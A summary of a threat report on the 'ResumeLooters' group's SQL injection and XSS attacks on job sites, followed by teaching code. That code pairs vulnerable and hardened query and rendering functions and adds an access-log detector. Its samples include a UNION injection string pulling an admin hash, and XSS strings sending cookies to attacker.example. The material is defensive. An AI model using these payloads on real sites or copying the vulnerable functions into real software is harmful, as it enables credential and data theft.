February 6, 2024 at 10:11AM
The ‘ResumeLooters’ threat group has compromised 65 job listing and retail sites using SQL injection and cross-site scripting (XSS) attacks, stealing personal data from over two million job seekers, primarily in the APAC region. The group uses penetration-testing tools such as SQLmap and Acunetix to find and exploit weaknesses, then injects malicious scripts into the compromised sites to harvest visitor data, all for financial gain. Group-IB observed the attackers trying to sell the stolen data and links their activity to China.
The key takeaways from the report are as follows:
– A threat group named ‘ResumeLooters’ has stolen personal data of over two million job seekers by compromising 65 legitimate job listing and retail sites.
– The group predominantly targets the APAC region, focusing on sites in Australia, Taiwan, China, Thailand, India, and Vietnam.
– Their methods include SQL injection and cross-site scripting (XSS) attacks to breach the targeted sites, primarily job-search portals and online retail shops.
– Group-IB has been tracking ‘ResumeLooters’ since first identifying the group and observed it attempting to sell the stolen data through Telegram channels.
– The attackers rely on widely available penetration-testing tools, both open-source and commercial, including SQLmap, Acunetix, BeEF (Browser Exploitation Framework), X-Ray, Metasploit, ARL (Asset Reconnaissance Lighthouse) and Dirsearch, during reconnaissance and exploitation.
– ‘ResumeLooters’ injects malicious scripts into various locations in a website’s HTML to steal visitors’ information, and has also used custom techniques such as creating fake employer profiles and posting fake CV documents containing XSS scripts, so that the payload runs whenever the poisoned content is viewed on the site.
– Group-IB gained access to the database in which the attackers stored the stolen data, which revealed that they had managed to obtain administrator access on some of the compromised sites.
– The group’s primary motive is financial gain, as they attempt to sell the stolen data to other cybercriminals via Telegram accounts with Chinese names.
– While the attackers’ origin is not explicitly confirmed, the fact that they sell stolen data in Chinese-speaking groups and use Chinese-language versions of their tools makes it highly probable that they operate from China.
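The two techniques the report attributes to the group, SQL injection against a site’s search or login forms and stored XSS planted in CV and profile fields, both come down to untrusted input reaching an interpreter unescaped. The following is an added example written for this page, not code from the report or from any affected site: a toy job-board backend on an in-memory SQLite database with a vulnerable and a hardened version of each operation. The table names, the sample candidates and the attack strings are all constructed for the illustration.

```python
import html
import sqlite3

# Constructed sample schema and data (not taken from any real site).
SEED_SQL = """
CREATE TABLE candidates (id INTEGER PRIMARY KEY, name TEXT, email TEXT, cv TEXT);
INSERT INTO candidates (name, email, cv) VALUES
  ('Ada', 'ada@example.com', 'Python, security'),
  ('Bo',  'bo@example.com',  'Java');
CREATE TABLE users (username TEXT, pw_hash TEXT);
INSERT INTO users VALUES ('admin', '$2b$12$constructed.not.a.real.hash');
"""

# Constructed attack inputs: a UNION-based injection that pulls the admin
# credential out of a different table, and a CV body carrying a script.
ATTACK_PAYLOAD = "x' UNION SELECT username, pw_hash FROM users --"
POISONED_CV = '<script>fetch("https://attacker.example/c?d=" + document.cookie)</script>'


def new_db():
    """Fresh in-memory database seeded with the sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript(SEED_SQL)
    return con


def search_vulnerable(con, keyword):
    """Insecure: the keyword is concatenated into the SQL text, so a quote in the
    input closes the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name, email FROM candidates WHERE cv LIKE '%{keyword}%'"
    return con.execute(sql).fetchall()


def search_hardened(con, keyword):
    """Parameterised: the keyword is bound as data, never as SQL syntax."""
    return con.execute(
        "SELECT name, email FROM candidates WHERE cv LIKE ?",
        (f"%{keyword}%",),
    ).fetchall()


def render_cv_vulnerable(cv_text):
    """Insecure: stored CV text is emitted into the page verbatim, so a script
    planted in a CV runs in the browser of whoever views it (stored XSS)."""
    return f"<div class='cv'>{cv_text}</div>"


def render_cv_hardened(cv_text):
    """Output-encode untrusted text for the HTML body context before emitting it."""
    return f"<div class='cv'>{html.escape(cv_text, quote=True)}</div>"


if __name__ == "__main__":
    con = new_db()
    print("legit search:      ", search_hardened(con, "Python"))
    print("injected (vuln):   ", search_vulnerable(con, ATTACK_PAYLOAD))
    print("injected (hardened):", search_hardened(con, ATTACK_PAYLOAD))
    print(render_cv_hardened(POISONED_CV))
```

Against the vulnerable search the payload returns the admin row from the `users` table, which is the kind of foothold the report describes turning into administrator access; the same string handed to the parameterised query is just an unusual keyword that matches nothing. `html.escape` covers the HTML body context only; attributes, URLs and JavaScript contexts each need their own encoding.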
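Because the group leans on off-the-shelf scanners, the noisy part of its activity is visible in ordinary web-server logs. The following is an added example for this page, not tooling from Group-IB or the report: a small detector that parses combined-format access-log lines, URL-decodes the request target, and flags sqlmap’s default User-Agent (which contains `sqlmap/`) together with a deliberately small set of SQL-injection and XSS payload patterns. The log lines, IP addresses and payloads are constructed for the illustration; fingerprints for Acunetix and the other tools listed above vary by version and are not modelled here.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [05/Feb/2024:09:12:01 +0000] "GET /jobs?q=python HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [05/Feb/2024:09:12:05 +0000] "GET /jobs?q=python%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.12#stable (https://sqlmap.org)"
198.51.100.7 - - [05/Feb/2024:09:12:06 +0000] "GET /jobs?q=python%27%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 312 "-" "sqlmap/1.7.12#stable (https://sqlmap.org)"
198.51.100.9 - - [05/Feb/2024:09:15:40 +0000] "POST /employer/profile HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Feb/2024:09:15:41 +0000] "GET /cv/upload?name=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# sqlmap's default User-Agent is "sqlmap/<version> ..."; the payload patterns
# below are a small, high-confidence set rather than a full WAF ruleset.
TOOL_UA_RE = re.compile(r"sqlmap/", re.I)
SQLI_RE = re.compile(
    r"""['"]\s*(or|and)\s+\d+\s*=\s*\d+     # ' OR 1=1  /  ' AND 1=1
        |union\s+(all\s+)?select            # UNION SELECT column probing
        |information_schema                 # schema enumeration
        |\b(sleep|benchmark|pg_sleep)\s*\(  # time-based blind injection
    """,
    re.I | re.X,
)
XSS_RE = re.compile(r"<\s*script|javascript:|\bon[a-z]+\s*=", re.I)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Scanners percent-encode payloads; decode before pattern matching.
    rec["decoded_target"] = unquote_plus(rec["target"])
    return rec


def classify(rec):
    """List the detection reasons that apply to one parsed record (empty if benign)."""
    reasons = []
    if TOOL_UA_RE.search(rec["ua"]):
        reasons.append("scanner-ua")
    if SQLI_RE.search(rec["decoded_target"]):
        reasons.append("sqli-payload")
    if XSS_RE.search(rec["decoded_target"]):
        reasons.append("xss-payload")
    return reasons


def analyze(log_text):
    """Run every line through the rules and return the flagged requests in order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({
                "ip": rec["ip"],
                "status": rec["status"],
                "target": rec["decoded_target"],
                "reasons": reasons,
            })
    return findings


def offenders(log_text):
    """Count flagged requests per source IP, a cheap pivot for triage."""
    return Counter(f["ip"] for f in analyze(log_text))


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ip"], f["status"], f["reasons"], f["target"][:60])
    print(offenders(SAMPLE_LOG))
```

The sqlmap User-Agent is trivially changed with its `--random-agent` option, so the payload rules matter more than the UA rule in practice; a 500 response following an injection attempt is also worth weighting, since it usually means the injected syntax reached the database. For real volumes, feed the same rules into the SIEM’s log source rather than a Python loop.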